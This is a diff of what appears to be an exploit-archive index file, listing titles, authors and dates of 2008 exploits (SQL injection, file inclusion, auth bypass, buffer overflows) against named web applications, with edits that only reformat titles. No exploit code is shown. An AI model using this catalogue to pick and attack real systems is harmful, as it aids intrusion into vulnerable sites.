+7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) RFI",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0 -7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0 +7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 - (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense (Auth bypass) Remote SQL Injection",2008-11-19,d3b4g,php,webapps,0 7164,platforms/php/webapps/7164.txt,"Pre Job Board (Auth Bypass) Remote SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 7165,platforms/php/webapps/7165.pl,"wPortfolio <= 0.3 - Remote Arbitrary File Upload Exploit",2008-11-19,Osirys,php,webapps,0 7166,platforms/php/webapps/7166.txt,"AskPert (Auth bypass) Remote SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 -7167,platforms/windows/remote/7167.html,"Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit",2008-11-20,Nine:Situations:Group,windows,remote,0 +7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (uri handler) Arbitrary Parameter Injection Exploit",2008-11-20,Nine:Situations:Group,windows,remote,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion Exploit",2008-11-20,StAkeR,php,webapps,0 7170,platforms/php/webapps/7170.php,"wPortfolio <= 0.3 Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 -7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 (Auth Bypass) Remote SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 -7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit",2008-11-20,irk4z,php,webapps,0 +7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 - (Auth Bypass) Remote SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 +7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - (messages.php) Remote SQL Injection Exploit",2008-11-20,irk4z,php,webapps,0 7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message CSRF + Worm Exploit",2008-11-20,Mx,php,webapps,0 -7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 (Auth Bypass) Remote SQL Injection",2008-11-20,Stack,php,webapps,0 +7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Auth Bypass) Remote SQL Injection",2008-11-20,Stack,php,webapps,0 7176,platforms/php/webapps/7176.txt,"ToursManager (tourview.php tourid) Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation Exploit",2008-11-20,"Jakub Wartak",linux,local,0 7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service PoC",2008-11-20,ProTeuS,windows,dos,0 7179,platforms/php/webapps/7179.txt,"NatterChat 1.1 - Remote Admin Bypass",2008-11-20,Stack,php,webapps,0 7180,platforms/php/webapps/7180.txt,"VCalendar (VCalendar.mdb) Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny (uri handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 -7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 +7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 7183,platforms/linux/remote/7183.txt,"verlihub <= 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 -7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 (product) SQL Injection",2008-11-22,NoGe,php,webapps,0 +7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0 7185,platforms/php/webapps/7185.php,"Discuz! Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 -7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 (blog.php user) Remote SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 +7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) Remote SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 @@ -6746,7 +6746,7 @@ id,file,description,date,author,platform,type,port 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) Remote SQL Injection",2008-11-23,snakespc,php,webapps,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Remote File Upload",2008-11-23,x0r,php,webapps,0 -7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 +7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7200,platforms/php/webapps/7200.txt,"PG Real Estate (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 @@ -6771,15 +6771,15 @@ id,file,description,date,author,platform,type,port 7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 -7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0 +7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0 7225,platforms/php/webapps/7225.txt,"pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 7226,platforms/windows/dos/7226.html,"Google Chrome Browser MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 7227,platforms/php/webapps/7227.txt,"chipmunk topsites - (auth bypass/XSS) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7228,platforms/php/webapps/7228.txt,"clean CMS 1.5 - (blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 -7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 -7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit",2008-11-25,JosS,php,webapps,0 -7231,platforms/php/webapps/7231.txt,"fuzzylime CMS 3.03 (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 -7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 +7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 +7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection Exploit",2008-11-25,JosS,php,webapps,0 +7231,platforms/php/webapps/7231.txt,"fuzzylime CMS 3.03 - (track.php p) Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 +7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - File Upload Exploit",2008-11-25,cOndemned,php,webapps,0 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ (view_snaps.php type) Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 @@ -6799,8 +6799,8 @@ id,file,description,date,author,platform,type,port 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Remote File Upload",2008-11-27,ZoRLu,php,webapps,0 -7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 -7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 (HotelID) Remote SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 +7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 +7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) Remote SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - (id) Remote SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 @@ -6809,86 +6809,86 @@ id,file,description,date,author,platform,type,port 7260,platforms/php/webapps/7260.txt,"BaSiC-CMS (acm2000.mdb) Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS (index.php id) Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0 -7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 (Auth Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 +7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Auth Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)",2008-11-28,Abysssec,windows,local,0 7265,platforms/php/webapps/7265.txt,"web calendar system <= 3.40 - (XSS/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 -7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 +7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) 0.0.1 - Remote SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone (Auth Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7280,platforms/asp/webapps/7280.txt,"Active Newsletter 4.3 (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7280,platforms/asp/webapps/7280.txt,"Active Newsletter 4.3 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7282,platforms/asp/webapps/7282.txt,"Active Trade 2 (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 (index.php mid) SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 +7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - (index.php mid) SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0 -7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 -7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 (ItemID) Blind SQL Injection",2008-11-29,Stack,php,webapps,0 +7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - (ItemID) Blind SQL Injection",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.NET Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Auth Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit",2008-11-29,"CWH Underground",php,webapps,0 -7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 (QuizID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - (QuizID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 - (.mov) Multiple Off By Overflow PoC",2008-11-30,"laurent gaffié ",windows,dos,0 -7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 +7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - (rdp file) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 -7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 (Auth Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 -7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 (Auth Bypass) SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 +7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 +7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - (Auth Bypass) SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Remote blind SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 -7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0 +7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL/fu/bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench (EWB File) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 -7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 +7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 7309,platforms/windows/local/7309.pl,"Cain & Abel <= 4.9.24 - (.rdp) Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-11-30,NoGe,php,webapps,0 -7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 (edit.php site) Remote SQL Injection",2008-12-01,JIKO,php,webapps,0 +7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) Remote SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP Knowledgebase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 7313,platforms/linux/local/7313.sh,"Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC",2008-12-01,"Paul Szabo",linux,local,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Auth Bypass) Remote SQL Injection",2008-12-01,t0fx,php,webapps,0 -7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 (ASPPortal.mdb) Database Disclosure Vulnreability",2008-12-01,"CWH Underground",asp,webapps,0 -7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 (viewcat.php cid) Remote SQL Injection Exploit",2008-12-01,"CWH Underground",php,webapps,0 -7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 +7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure Vulnreability",2008-12-01,"CWH Underground",asp,webapps,0 +7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) Remote SQL Injection Exploit",2008-12-01,"CWH Underground",php,webapps,0 +7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - (DD/SQL/XSS) Vulnerabilities",2008-12-02,Pouya_Server,php,webapps,0 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook Remote Command Execution Exploit",2008-12-02,"CWH Underground",php,webapps,0 7323,platforms/php/webapps/7323.txt,"SunByte e-Flower (id) Remote SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 -7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 +7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 -7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 +7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 -7328,platforms/php/webapps/7328.pl,"Check New 4.52 (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 -7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 -7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 -7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit",2008-12-03,StAkeR,php,webapps,0 +7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 +7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - (rdp file) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 +7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 +7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - (id) SQL Injection Exploit",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS (Auth Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 7334,platforms/windows/local/7334.pl,"RadAsm <= 2.2.1.5 - (.RAP) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 -7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 -7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities",2008-12-04,cOndemned,php,webapps,0 +7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 +7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion Vulnerabilities",2008-12-04,cOndemned,php,webapps,0 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - (SQL/DD) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP (users.mdb) Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0 7339,platforms/php/webapps/7339.txt,"template creature - (SQL/DD) Multiple Vulnerabilities",2008-12-04,ZoRLu,php,webapps,0 7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - (News.mdb) Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0 -7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 +7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 7343,platforms/php/webapps/7343.txt,"Joomla Component mydyngallery 1.4.2 - (directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0 -7344,platforms/php/webapps/7344.txt,"Gravity GTD <= 0.4.5 (rpc.php objectname) LFI/RCE",2008-12-04,dun,php,webapps,0 +7344,platforms/php/webapps/7344.txt,"Gravity GTD <= 0.4.5 - (rpc.php objectname) LFI/RCE",2008-12-04,dun,php,webapps,0 7345,platforms/php/webapps/7345.txt,"BNCwi <= 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 -7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 (id) SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 +7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - (id) SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 7347,platforms/windows/local/7347.pl,"PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (bypass/DD) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 7349,platforms/asp/webapps/7349.txt,"RankEm (rankup.asp siteID) Remote SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 @@ -6901,79 +6901,79 @@ id,file,description,date,author,platform,type,port 7356,platforms/asp/webapps/7356.txt,"asp autodealer - (SQL/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL Multiple Remote SQL Injection Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 